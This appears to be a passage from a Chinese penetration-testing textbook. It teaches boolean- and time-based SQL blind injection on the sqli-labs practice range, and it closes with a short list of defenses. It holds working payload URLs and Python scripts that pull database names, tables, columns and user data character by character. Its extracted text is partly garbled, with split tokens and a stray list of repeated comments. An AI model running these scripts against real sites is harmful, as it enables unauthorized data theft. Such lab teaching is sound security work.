在进行SQL注入攻击时，若确定有注入点但因页面没有回显位来显示数据，导致无法获取有效信息时，就要进行SQL盲注。

5.3.1 简介

目前常用的SQL盲注主要分以下两类：

·基于布尔的盲注：当页面没有回显位、不会输出SQL语句报错信息时，通过返回页面响应的正常或不正常的情况来进行注入。

·基于时间的盲注：当页面没有回显位、不会输出SQL语句报错信息、不论 SQL语句的执行结果对错都返回一样的页面时，通过页面的响应时间来进行注入。

上述两种盲注方式都存在的缺点就是需要耗费大量的精力去进行测试，因此在渗透测中常使用工具或脚本来代替手工操作，完成烦琐的注入过程。

sqli-labs是由一位印度程序员编写的SQL注入练习靶场，包含多种类型的注入方式，接下来将会在sqli-labs环境下具体讲解SQL盲注脚本的编写过程。

5.3.2 基于布尔型SQL盲注检测

本节以sqli-labs靶场的第八关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ，1。

如果盲注的结果正确，则会显示"You are in..........." ，如图5-5所示。

如果盲注的结果错误，则不会显示"You are in..........." ，如图5-6所示。

那么，我们只需要提前构造相应的注入语句，然后根据页面是否回显"You

are in..........."来进行判断即可，让脚本进行自动化操作。笔者已经构造好所需的

Payload ，代码如下所示：

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if(length(database())=8,1,0) %23

获取数据库名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r(database(),1,1))=115, 1,0) %23

获取数据库表的数量

>>> http://127 .0 .0 .1/sql/Less-8/?id=1 ' and if((select count(*)table_name

from information_schema .tables where table_schema= 'security ')=4,1,0) %23

获取数据库表名称的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select LENGTH(table_name) from information_schema .tables where table_schema= 'security ' limit 1,1)=

8,1,0) %23

获取数据库表名

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select table_name

from information_schema .tables where table_schema= 'security ' limit 0,1), 1,1))=101,1,0) %23

获取表的字段数量

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select count(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ')=3,1,0) %23

获取字段的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if((select length(column_name) from

information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1)=2,1,0) %23

获取表的字段

>>> http://127 .0 .0 .1/Less-8/?id=1 ' and if(ascii(subst r((select column_name from information_schema .columns where table_schema= 'security ' and table _name= 'users ' limit 0,1),1,1))=105,1,0) %23

获取字段数据的数量

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select count(username) from

users)=13,1,0) %23

获取字段数据的长度

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if ((select length(username) from

users limit 0,1)=4,1,0) %23

获取字段数据

>>> http://127 .0 .0 .1/Less-8/?id=1 'and if (ascii(subst r((select username

from users limit 0,1),1,1))=68,1,0) %23

图5-6 布尔注入结果错误

1）写入脚本信息，导入模块，定义存储数据库数据的变量且定义一个request 对象用来进行请求，代码如下：

盲注主函数

def StartSqli(url) :

GetDBName(url)

print("[+]当前数据库名 :{0}" .format(DBName))

GetDBTables(url,DBName)

print("[+]数据库{0}的表如下 :" .format(DBName))

for item in range(len(DBTables)) :

print("(" + str(item + 1) + ")" + DBTables[item])

tableIndex = in t(input("[*]请输入要查看的表的序号 :")) - 1

GetDBColumns(url,DBName,DBTables[tableIndex])

while True:

print("[+]数据表{0}的字段如下 :" .format(DBTables[tableIndex]))

for item in range(len(DBColumns)) :

print("(" + str(item + 1) + ")" + DBColumns[item])

columnIndex = in t(input("[*]请输入要查看的字段的序号(输入0退出) :"))-1 if(columnIndex == -1) :

break

else:

GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 3）编写获取数据库名的函数，根据得到的URL获取数据库名并把最后的结果存入DBName： |
| def GetDBName(url) : # 引用全局变量DBName，用来存放网页当前使用的数据库名 global DBName print("[-]开始获取数据库名的长度") # 保存数据库名长度的变量 DBNameLen = 0 # 用于检查数据库名长度的payload payload = " ' and if(length(database())={0},1,0) %23" # 把URL和payload进行拼接，得到最终请求的URL targetUrl = url + payload # 用for循环来遍历请求，得到数据库名的长度 for DBNameLen in range(1, 99) : # 对payload中的参数进行赋值猜解 res = conn .get(targetUrl.format(DBNameLen)) # 判断flag是否在返回的页面中 if flag in res .content.decode("utf-8") : print("[+]数据库名的长度 :" + str(DBNameLen)) break print("[-]开始获取数据库名") payload = " ' and if(ascii(subst r(database(),{0},1))={1},1,0) %23" targetUrl = url + payload # a表示subst r()函数的截取起始位置 for a in range(1, DBNameLen+1) : # b表示在ASCII码中33～126位可显示的字符 for b in range(33, 127) : res = conn .get(targetUrl.format(a,b)) if flag in res .content.decode("utf-8") : DBName += chr(b) print("[-]"+ DBName) break |
| 4）编写获取数据库表的函数，根据获取到的URL和数据库名获取数据库中的表，并把结果以列表的形式存入DBTables： |

获取数据库表的函数

def GetDBTables(url, dbname) :

global DBTables

存放数据库表数量的变量

DBTableCount = 0

print("[-]开始获取{0}数据库表数量 :" .format(dbname))

获取数据库表数量的payload

payload = " ' and if((select count(*)table_name from information_schema . tables where table_schema= '{0} ')={1},1,0) %23"

targetUrl = url + payload

开始遍历获取数据库表的数量

for DBTableCount in range(1, 99) :

res = conn .get(targetUrl.format(dbname, DBTableCount))

if flag in res .content.decode("utf-8") :

print("[+]{0}数据库中表的数量为 :{1}" .format(dbname, DBTableCount)) break

print("[-]开始获取{0}数据库的表" .format(dbname))

遍历表名时临时存放表名长度的变量

tableLen = 0

a表示当前正在获取表的索引

for a in range(0,DBTableCount) :

print("[-]正在获取第{0}个表名" .format(a+1))

先获取当前表名的长度

for tableLen in range(1, 99) :

payload = " ' and if((select LENGTH(table_name) from

information_schema .tables where table_schema= '{0} '

limit {1},1)={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, a, tableLen))

if flag in res .content.decode("utf-8") :

break

开始获取表名

临时存放当前表名的变量

table = ""

b表示当前表名猜解的位置

for b in range(1, tableLen+1) :

payload = " ' and if(ascii(subst r((select table_name from

information_schema .tables where table_schema= '{0} ' limit {1},1),{2},1))={3},1,0) %23"

targetUrl = url + payload

c表示在ASCII码中33～126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, a, b, c))

if flag in res .content.decode("utf-8") :

table += chr(c)

print(table)

break

把获取到的表名加入DBTables

DBTables .append(table)

清空table，用来继续获取下一个表名

table = ""

5）编写获取表字段的函数，根据获取的URL 、数据库名和数据库表，获取表的字段并把结果以列表的形式存入DBColumns：

def GetDBColumns(url, dbname, dbtable) :

global DBColumns

存放字段数量的变量

DBColumnCount = 0

print("[-]开始获取{0}数据表的字段数 :" .format(dbtable))

for DBColumnCount in range(99) :

payload = " ' and if((select count(column_name) from information_ schema .columns where table_schema= '{0} ' and table_name= '{1} ')

={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, DBColumnCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}数据表的字段数为 :{1}" .format(dbtable, DBColumnCount))

break

开始获取字段的名称

保存字段名的临时变量

column = ""

a表示当前获取字段的索引

for a in range(0, DBColumnCount) :

print("[-]正在获取第{0}个字段名" .format(a+1))

先获取字段的长度

for columnLen in range(99) :

payload = " ' and if((select length(column_name) from information_ schema .columns where table_schema= '{0} ' and table_name= '{1} ' limit {2},1)={3},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbname, dbtable, a, columnLen)) if flag in res .content.decode("utf-8") :

break

b表示当前字段名猜解的位置

for b in range(1, columnLen+1) :

payload = " ' and if(ascii(subst r((select column_name from

information_schema .columns where table_schema= '{0} ' and

table_name= '{1} ' limit {2},1),{3},1))={4},1,0) %23"

targetUrl = url + payload

c表示在ASCII码中33～126位可显示的字符

for c in range(33, 127) :

res = conn .get(targetUrl.format(dbname, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

column += chr(c)

print(column)

break

把获取到的字段名加入DBColumns

DBColumns .append(column)

清空column，用来继续获取下一个字段名

column = ""

6）编写数据获取函数，根据获取的URL 、数据表名和数据表字段来获取数据。数据以字典的形式存放，键为字段名，值为字段数据形成的列表：

获取表数据的函数

def GetDBData(url,dbtable,dbcolumn) :

global DBData

先获取字段的数据数量

DBDataCount = 0

print("[-]开始获取{0}表{1}字段的数据数量" .format(dbtable, dbcolumn))

for DBDataCount in range(99) :

payload = "'and if ((select count({0}) from {1})={2},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, DBDataCount)) if flag in res .content.decode("utf-8") :

print("[-]{0}表{1}字段的数据数量为 :{2}" .format(dbtable, dbcolumn, DBDataCount))

break

for a in range(0, DBDataCount) :

print("[-]正在获取{0}的第{1}个数据" .format(dbcolumn, a+1))

先获取这个数据的长度

dataLen = 0

for dataLen in range(99) :

payload = "'and if ((select length({0}) from {1} limit {2},1) ={3},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, dataLen)) if flag in res .content.decode("utf-8") :

print("[-]第{0}个数据长度为 :{1}" .format(a+1, dataLen))

break

临时存放数据内容变量

data = ""

开始获取数据的具体内容

b表示当前数据内容猜解的位置

for b in range(1, dataLen+1) :

for c in range(33, 127) :

payload = "'and if (ascii(subst r((select {0} from {1} limit {2},1),{3},1))={4},1,0) %23"

targetUrl = url + payload

res = conn .get(targetUrl.format(dbcolumn, dbtable, a, b, c)) if flag in res .content.decode("utf-8") :

data += chr(c)

print(data)

break

放到以字段名为键，值为列表的字典中

DBData .setdefault(dbcolumn,[]) .append(data)

print(DBData)

把data清空，继续获取下一个数据

data = ""

5.3.3 基于时间型SQL盲注检测

本节以sqli-labs靶场的第九关为例。该关的SQL查询语句为SELECT*FROM users WHERE id='$id'LIMIT 0 ，1。

这关不管语句正确还是错误，页面始终显示"Your are in..........." ，如图5-7所

示，所以我们只能通过基于时间的盲注方法来获取数据，根据页面的返回时间来判断结果。

完成注入过程所需的Payload的代码如下：

判断数据库名的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(length(database())=8,sleep(5), 0) %23

获取数据库名

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r(database(),1,1)) =115,sleep(5),0)%23

获取数据库中表的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(table_name) from

information_schema .tables where table_schema= 'security ' )=4,sleep(5),0) %23

获取数据库表的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(table_name)

from information_schema .tables where table_schema= 'security ' limit 0,1)= 6,sleep(5),0) %23

获取数据库表

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select table_

name from information_schema .tables where table_schema= 'security ' limit 0,1),1,1))=101,sleep(5),0)%23

获取数据库表中字段的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ')=3,sleep(5),0) %23

获取表字段的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(column_name) from information_schema .columns where table_schema= 'security ' and

table_name= 'users ' limit 0,1)=2,sleep(5),0) %23

获取数据库字段

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select column_ name from information_schema .columns where table_schema= 'security ' and table_name= 'users ' limit 0,1),1,1))=105,sleep(5),0) %23

获取字段数据的数量

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select count(username) from users)=13,sleep(5),0) %23

获取字段数据的长度

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if((select length(username) from users limit 0,1)=4,sleep(5),0) %23

获取数据内容

>>> http://127 .0 .0 .1/sql/Less-9/?id=1 ' and if(ascii(subst r((select username from users limit 0,1),1,1))=68,sleep(5),0) %23

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 本节的代码与基于布尔的盲注脚本十分相似，不同之处在于此处脚本需要用到time模块，判断结果的语句和所使用的Payload不相同。以下将列出部分代码，读者可当作练习自行完成编写，若有疑问，可参考源代码。获取数据库名的函数代码如下： |
| # 获取数据库名的函数 def GetDBName(url) : # 引用全局变量DBName，用来存放网页当前使用的数据库名 global DBName print("[-]开始获取数据库名的长度") # 保存数据库名长度的变量 DBNameLen = 0 # 用于检查数据库名长度的payload payload = " ' and if(length(database())={0},sleep(5),0) %23" # 把URL和payload进行拼接，得到最终的请求URL targetUrl = url + payload # 用for循环来遍历请求，得到数据库名的长度 for DBNameLen in range(1, 99) : # 开始时间 timeStart = time .time() # 开始访问 res = conn .get(targetUrl.format(DBNameLen)) # 结束时间 timeEnd = time .time() # 判断时间差 if timeEnd - timeStart >= 5: print("[+]数据库名的长度 :" + str(DBNameLen)) break print("[-]开始获取数据库名") payload = " ' and if(ascii(subst r(database(),{0},1))={1},sleep(5),0)%23" targetUrl = url + payload # a表示subst r()函数的截取起始位置 for a in range(1, DBNameLen+1) : # b表示在ASCII码中33～126位可显示的字符 for b in range(33, 127) : timeStart = time .time() res = conn .get(targetUrl.format(a,b)) timeEnd = time .time() if timeEnd - timeStart >= 5: DBName += chr(b) print("[-]"+ DBName) break |

下面测试一下效果。

获取数据库名如下所示：

获取数据库表如下所示：

获取字段数据，如下所示：

5.3.4 防御策略

SQL盲注属于SQL注入的一种方式。下面介绍的几种防御方法可以有效降低 SQL注入对网站的危害：

1）用参数化查询的方式代替动态SQL。

2）避免显示数据库的错误信息。

3）在服务器上安装Web应用程序防火墙（Web Application Firewall， WAF）。

4）限制数据库的权限。

5）对于数据库中的敏感信息进行加密保存。

6）根据需求升级数据库的版本，避免旧版数据库中的已知漏洞。

SQL盲注漏洞

获取数据库名

获取数据库表的数量

获取数据库表名称的长度

获取数据库表名

获取表的字段数量

获取字段的长度

获取表的字段

获取字段数据的数量

获取字段数据的长度

获取字段数据

盲注主函数

获取数据库表的函数

存放数据库表数量的变量

获取数据库表数量的payload

开始遍历获取数据库表的数量

遍历表名时临时存放表名长度的变量

a表示当前正在获取表的索引

先获取当前表名的长度

开始获取表名

临时存放当前表名的变量

b表示当前表名猜解的位置

c表示在ASCII码中33～126位可显示的字符

把获取到的表名加入DBTables

清空table，用来继续获取下一个表名

存放字段数量的变量

开始获取字段的名称

保存字段名的临时变量

a表示当前获取字段的索引

先获取字段的长度

b表示当前字段名猜解的位置

c表示在ASCII码中33～126位可显示的字符

把获取到的字段名加入DBColumns

清空column，用来继续获取下一个字段名

获取表数据的函数

先获取字段的数据数量

先获取这个数据的长度

临时存放数据内容变量

开始获取数据的具体内容

b表示当前数据内容猜解的位置

放到以字段名为键，值为列表的字典中

把data清空，继续获取下一个数据

判断数据库名的长度

获取数据库名

获取数据库中表的数量

获取数据库表的长度

获取数据库表

获取数据库表中字段的数量

获取表字段的长度

获取数据库字段

获取字段数据的数量

获取字段数据的长度

获取数据内容